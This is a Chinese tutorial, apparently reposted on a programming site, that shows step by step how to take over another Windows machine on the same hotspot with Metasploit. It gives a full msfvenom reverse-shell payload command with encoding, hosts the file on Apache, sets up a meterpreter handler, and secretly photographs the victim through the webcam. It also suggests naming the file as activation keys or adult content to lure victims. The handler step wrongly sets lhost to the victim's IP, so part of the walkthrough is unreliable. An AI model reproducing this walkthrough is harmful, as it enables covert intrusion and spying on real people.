基于MSF控制同一热点(局域网)下的其他设备

主要是基于Metasploit,利于msfvenom生成的恶意软件获取目标shell。

我想各位都很熟悉的一个操作,那就是使用虚拟机当攻击机,本地物理机作为靶机,但这样其实并不能很好的反应出现实情况,有点自己攻击自己的感觉。

因此,这里我并不使用自己的物理机和虚拟机去演示,而是以在同一热点(模拟一个小型的局域网环境)下的设备进行演示,即控制另一台与我处在同一热点下的设备。

环境部署:

先让两台物理机连上同一个热点

(我还试了一下宽带,但是显示出来的是公网ip,公网肯定是不行的,一定要是在同一局域网下)

1、攻击机:虚拟机 kali Linux(桥接模式,保证与物理机在同一网段)

kali 的ip地址:192.168.29.69

2、被控设备:物理机 台电Tbook16

物理靶机的ip地址:192.168.29.236

对于装虚拟机的物理机的ip并不需要,但可以肯定,一定也在192.168.29.下

先测试一下两台不同的设备是否都能互相ping通:

kali ping 台电:

台电 ping kali:

可以互相ping通

使用 msfvenom 生成的恶意软件:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.29.69 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/Myon.exe

其中192.168.29.69 是我们攻击机kali的ip, Myon.exe是恶意软件的名字,实际攻击中肯定不会改这样的名字,一般都是叫什么Windows激活密钥、什么带点颜色的东西你们懂的。

我这里指定生成在/var/www/html目录下,因此可以直接访问 192.168.29.69/Myon.exe 进行下载

接下来我们先开启 kali 的Apache服务

systemctl start apache2

服务开启后,测试是否可以正常访问:192.168.29.69

(尽管前面已经测试二者能互相ping通,但是我们还需要进一步确认)

1、kali访问

2、本地物理机访问

3、另一台物理机台电访问(这个能不能访问到才是最重要的)

访问成功,说明这两台物理机以及桥接模式的虚拟机,三者都在同一局域网下!

下载恶意软件Myon.exe

在攻击机kali启动Metasploit

msfdb run

选择使用的攻击模块

use exploit/multi/handler

查看需要设置的参数

show options

有两个东西需要设置

我们先设置攻击目标的ip即lhost(这里设置的是另一台物理机台电 Tbook16 的ip,就算我们不知道,在同一局域网下,我们也是可以使用Nmap这种工具扫出来的)

set lhost 192.168.29.236

设置攻击载荷,也就是我们攻击基于的payload

set payload windows/meterpreter/reverse_tcp

设置好后再次查看一下确保设置正确 

那么这个时候我们就可以开启监听了,使用 run 或者 exploit 命令进行攻击:

只要另一台物理机台电 Tbook16那边点击运行Myon.exe

kali 这边就会立刻建立连接

我们可以使用getuid命令获取用户的相关信息

使用help命令查看我们可以进行的操作,有很多,下面我演示调用对方的摄像头进行拍照

webcam_snap

从这个角度你们也可以看出来,这并不是我自己操作的计算机拍的,而是另一台与我处在同一局域网下的物理机拍摄的。

细想一下还是很恐怖的,在拍照这个操作执行的过程中,被控的计算机是没有任何感应反馈的,也就是说受害者并不知道自己执行了拍照操作,在这个网络如此普及的时代,没什么隐私可言,只要免杀做得强,所以说啊,不要乱连陌生开放热点,不要乱下东西,有些网站挂马都不需要你自己下,你不小心点到自己就给你下木马了,并且这些恶意代码的隐蔽性也越来越强。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/182755.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

pytorch安装1

用豆瓣源安装pytorch1.5.1(速度很快)-CSDN博客 详情请参考这位神仙的博客 我真的哭死,原来torch都安装好了,好不容易全部加载好了,但是,gpu配不上去,后来发现还是版本的问题版本不匹配具体版本…

JTS: 16 Orientation 方向

这里写目录标题 版本代码 版本 org.locationtech.jts:jts-core:1.19.0 链接: github 代码 public static void main(String[] args) {OrientationUse orientationUse new OrientationUse();orientationUse.test02();}public void test02() {A new Coordinate(2, 1);B new …

数据结构初阶---复杂度的OJ例题

复杂度的OJ例题 一、消失的数字1.思路一2.思路二3.思路三 二、旋转数组1.思路一2.思路二3.思路三 一、消失的数字 数组nums包含从0到n的所有整数,但其中缺了一个。请编写代码找出那个缺失的整数。你有办法在O(N)时间内完成吗? 链接:力扣&…

远程管理SSH服务

一、搭建SSH服务 1、关闭防火墙与SELinux # 关闭firewalld防火墙 # 临时关闭 systemctl stop firewalld # 关闭开机自启动 systemctl disable firewalld ​ # 关闭selinux # 临时关闭 setenforce 0 # 修改配置文件 永久关闭 vim /etc/selinux/config SELINUXdisabled 2、配置…

【深度学习】pytorch——Autograd

笔记为自我总结整理的学习笔记,若有错误欢迎指出哟~ 深度学习专栏链接: http://t.csdnimg.cn/dscW7 pytorch——Autograd Autograd简介requires_grad计算图没有梯度追踪的张量ensor.data 、tensor.detach()非叶子节点的梯度计算图特点总结 利用Autograd实…

Transformer:开源机器学习项目,上千种预训练模型 | 开源日报 No.66

huggingface/transformers Stars: 113.5k License: Apache-2.0 这个项目是一个名为 Transformers 的开源机器学习项目,它提供了数千种预训练模型,用于在文本、视觉和音频等不同领域执行任务。该项目主要功能包括: 文本处理:支持…

【Redis】hash数据类型-常用命令

文章目录 前置知识常用命令HSETHGETHEXISTSHDELHKEYSHVALSHGETALLHMGET关于HMSETHLENHSETNXHINCRBYHINCRBYFLOAT 命令小结 前置知识 redis自身就是键值对结构了,哈希类型是指值本⾝⼜是⼀个键值对结构,形如key"key",value{{field1…

面向萌新的数学建模入门指南

时间飞逝,我的大一建模生涯也告一段落。感谢建模路上帮助过我的学长和学姐们,滴水之恩当涌泉相报,写下这篇感想,希望可以给学弟学妹们一丝启发,也就完成我的想法了。拙劣的文笔,也不知道写些啥,…

idea必装插件EditStarters(快速引入依赖)

前言 一般来说我们要向一个 servlet 或者 Spring 项目中引入依赖都需要先到中心仓库找到对应的依赖,选择依赖的版本,把依赖添加到配置文件 pom.xml 中,这其实还是有点麻烦的,而通过 EditStarters 插件我们可以迅速的添加依赖到项目…

ElasticSearch高级功能详解与原理剖析

ES数据预处理 Ingest Node Elasticsearch 5.0后,引入的一种新的节点类型。默认配置下,每个节点都是Ingest Node: 具有预处理数据的能力,可拦截lndex或Bulk API的请求对数据进行转换,并重新返回给Index或Bulk APl 无…

万宾科技管网水位监测助力智慧城市的排水系统

以往如果要了解城市地下排水管网的水位变化,需要依靠人工巡检或者排查的方式,这不仅加大了人员的工作量,而且也为市政府带来了更多的工作难题。比如人员监管监测不到位或无法远程监控等情况,都会降低市政府对排水管网的管理能力&a…

自动控制原理答案

题目 现有一个单位反馈系统的开环传递函数为 试对该系统进行以下分析。 1.基础分析 计算该系统的闭环传递函数。 2.稳定性分析 2.1 使用劳斯判据分析该系统的稳定性 2.2 使用MATLAB编程,计算该系统有关于稳定性分析的零、极点,分析其稳定性。 3.暂态性…

京东数据平台:2023年Q3季度黄金市场数据分析

继9月国内黄金市场持续上涨后,进入10月中下旬后,黄金行情再度反转,多家品牌金饰价格再次突破600元/克,达到611元/克。 今年以来,黄金行情不断走俏,销售市场也有明显增长。根据鲸参谋平台的数据显示&#xf…

最受欢迎的程序员副业排行榜TOP6

程序员接单的情况并不少见,因为程序员职业工种的特殊性,能够比较快的衔接上新项目和新技术,所以接私活做副业成了许多程序员的不二之选。 程序员的副业是指程序员在业余时间里从事与编程相关的兼职工作,或者是与技术相关的创业项…

goquery库编写程序

goquery库的爬虫程序,该程序使用Go来爬取视频。。 package main ​ import ("fmt""net/http""net/http/httputil""io/ioutil""log""strings""golang.org/x/net/proxy""golang.org/x/n…

ACWing.第 128 场周赛 (B、C题解)

B、5286. 翻倍(思维推导) 一、题目要求 给定两个正整数,初始时两数均为 1。 你可以进行任意次(也可以不进行)翻倍操作,每次操作任选一个非负整数 k,令两数中的一个数乘以 k,另一个…

响应式项目施工装饰工程企业网站模板源码带后台

模板信息: 模板编号:647 模板编码:UTF8 模板颜色:蓝色 模板分类:基建、施工、地产、物业 适合行业:建筑施工类企业 模板介绍: 本模板自带eyoucms内核,无需再下载eyou系统&#xff…

python opencv 实现对二值化后的某一像素值做修改和mask叠加

实现对二值化后的某一像素值做修改 使用OpenCV的findNonZero函数找到所有非零(也就是像素值为255)的像素,然后遍历这些像素并修改他们的值。示例代码: import cv2 import numpy as np # 加载并二值化图像 img cv2.imread(…

使用 Python 进行自然语言处理第 4 部分:文本表示

一、说明 本文是在 2023 年 3 月为 WomenWhoCode 数据科学跟踪活动发表的系列文章中。早期的文章位于:第 1 部分(涵盖 NLP 简介)、第 2 部分(涵盖 NLTK 和 SpaCy 库)、第 2 部分(涵盖NLTK和SpaCy库&#xf…

产品经理日常工作流程汇总

产品经理在日常的团队工作过程中,承担着重要的衔接作用。由于工作性质的特殊性,产品经理日常工作内容特别繁杂,导致很多产品小白刚一上手,会无从下手,经常丢三落四。这时拥有一个好的工作流程,很大程度上就…